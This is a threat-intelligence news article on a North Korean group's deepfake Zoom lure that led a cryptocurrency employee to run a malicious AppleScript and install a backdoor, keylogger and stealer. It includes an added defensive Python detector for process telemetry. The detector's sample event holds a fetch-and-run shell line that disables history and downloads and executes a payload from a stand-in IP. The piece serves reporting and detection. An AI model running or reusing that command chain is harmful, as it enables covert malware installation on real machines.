BlueNoroff Deepfake Zoom Scam Targets Cryptocurrency Employee with Malware Attack
Date: June 19, 2025
Author: Ravie Lakshmanan
Category: Threat Intelligence / Malware
In a sophisticated cyber attack, the North Korean-affiliated threat group known as BlueNoroff has exploited deepfake technology to target an employee within the cryptocurrency sector. This incident, reported by cybersecurity firm Huntress, reveals a troubling trend of using artificial intelligence to enhance social engineering tactics aimed at infiltrating corporate environments.
The Attack Unfolds
Huntress detailed the attack on an unidentified employee from a cryptocurrency foundation, who was contacted through Telegram by a seemingly legitimate external party. The attacker made a request to discuss a business matter and shared a Calendly link to schedule a meeting.
However, the Calendly link led the employee to a fake Zoom website controlled by the attackers. Eventually, the employee participated in a group Zoom meeting featuring deepfakes of well-known senior leaders from their company, heightening the credibility of the ruse.
During the meeting, when the employee mentioned difficulties using their microphone, the deepfake personas urged them to download a Zoom extension meant to resolve the issue. This extension, shared via Telegram, was actually an AppleScript with the name "zoom_sdk_support.scpt."
Malware Installation
Once executed, the AppleScript performed several covert actions. While it initially displayed a legitimate webpage for Zoom’s software development kit (SDK), it simultaneously downloaded and executed a secondary payload from a remote server. This series of actions included disabling bash history logging to evade detection, checking for installed software needed to operate on the compromised Mac, and installing additional malware components.
The script also created a hidden file in which to store user credentials and downloaded several malicious binaries, including:
- Root Troy V4: A Go-based backdoor enabling remote command execution.
- InjectWithDyld: A binary loader that drops additional payloads on the host system.
- XScreen: An Objective-C keylogger designed to capture keystrokes, clipboard data, and screen activity.
- CryptoBot: A data stealer targeting cryptocurrency-related files.
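Defenders can hunt for this post-execution chain in process telemetry. What follows is an added example, not code from the Huntress report or the article: it correlates constructed process-start events by parent PID and flags an osascript launch of a .scpt file whose child processes show the behaviours the article lists (disabling shell history, fetching a remote payload, writing a hidden file). The article does not give the exact commands used, so the history-disable, download and hidden-file patterns, the file paths and the addresses are assumptions.

```python
import re
from collections import defaultdict

# Constructed process-start events (not from the Huntress report), in the parent/child
# shape an EDR or osquery process_events feed provides. PID 700 is benign and must not fire.
SAMPLE_EVENTS = [
    {"pid": 501, "ppid": 1,   "cmdline": "/Applications/Telegram.app/Contents/MacOS/Telegram"},
    {"pid": 612, "ppid": 501, "cmdline": "osascript /Users/alice/Downloads/zoom_sdk_support.scpt"},
    {"pid": 613, "ppid": 612, "cmdline": "open https://example.invalid/zoom-sdk"},
    {"pid": 614, "ppid": 612, "cmdline": "sh -c 'HISTFILE=/dev/null; curl -s http://203.0.113.5/s -o /tmp/.x; chmod +x /tmp/.x; /tmp/.x'"},
    {"pid": 700, "ppid": 1,   "cmdline": "zsh -lc 'brew update'"},
]

# Behaviours the article attributes to the script, as command-line patterns. The exact
# commands BlueNoroff used are not in the report; these are assumed common forms.
BEHAVIOURS = {
    "script_launch":   re.compile(r"\bosascript\b.*\.scpt\b"),
    "history_disable": re.compile(r"HISTFILE=/dev/null|unset HISTFILE|set \+o history|history -c"),
    "remote_download": re.compile(r"\b(curl|wget)\b.*https?://"),
    # an absolute path whose last segment starts with '.', i.e. a hidden file
    "hidden_file":     re.compile(r"(^|[\s'\"])/(?:[^/\s'\"]+/)*\.[^/\s'\"]+"),
}

def descendants(pid, children):
    """Yield every process in the tree rooted at pid (depth-first)."""
    stack = list(children.get(pid, []))
    while stack:
        ev = stack.pop()
        yield ev
        stack.extend(children.get(ev["pid"], []))

def triage(events, min_behaviours=2):
    """One finding per osascript .scpt launch whose subtree shows >= min_behaviours behaviours."""
    children = defaultdict(list)
    for ev in events:
        children[ev["ppid"]].append(ev)
    findings = []
    for ev in events:
        if not BEHAVIOURS["script_launch"].search(ev["cmdline"]):
            continue
        seen = set()
        for proc in [ev, *descendants(ev["pid"], children)]:
            for name, rx in BEHAVIOURS.items():
                if name != "script_launch" and rx.search(proc["cmdline"]):
                    seen.add(name)
        if len(seen) >= min_behaviours:
            findings.append({"pid": ev["pid"], "script": ev["cmdline"].split()[-1],
                             "behaviours": sorted(seen)})
    return findings
```

Running `triage(SAMPLE_EVENTS)` reports the chain rooted at PID 612 with all three behaviours, while the unrelated zsh session is ignored; the threshold keeps a lone osascript launch from firing on its own.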
A Broader Threat Landscape
BlueNoroff, also referred to as APT38, has a notorious history of targeting financial institutions and cryptocurrency businesses to generate revenue for the Democratic People’s Republic of Korea (DPRK). The group’s schemes, including the infamous "TraderTraitor" cryptocurrency heists, have increasingly relied on social engineering tactics to exploit gaps in remote working setups.
Huntress emphasized the vulnerability of remote workers in high-risk industries, particularly those engaged in sectors like cryptocurrency and blockchain technology. They cautioned that training employees to identify potential attacks—especially those relying on social engineering through remote meeting platforms—is crucial in safeguarding sensitive corporate environments.
Conclusion
This attack underscores the evolving methods of cybercriminals, who are increasingly integrating advanced technologies such as deepfake and artificial intelligence into their operations. As threat landscapes continue to expand, particularly concerning remote work, it is imperative for organizations to adopt robust security training and protocols to mitigate risks.
As these incidents reveal the sophistication of cyber threats, it becomes crucial for organizations, especially within the financial and cryptocurrency sectors, to remain vigilant and proactive in their cybersecurity measures.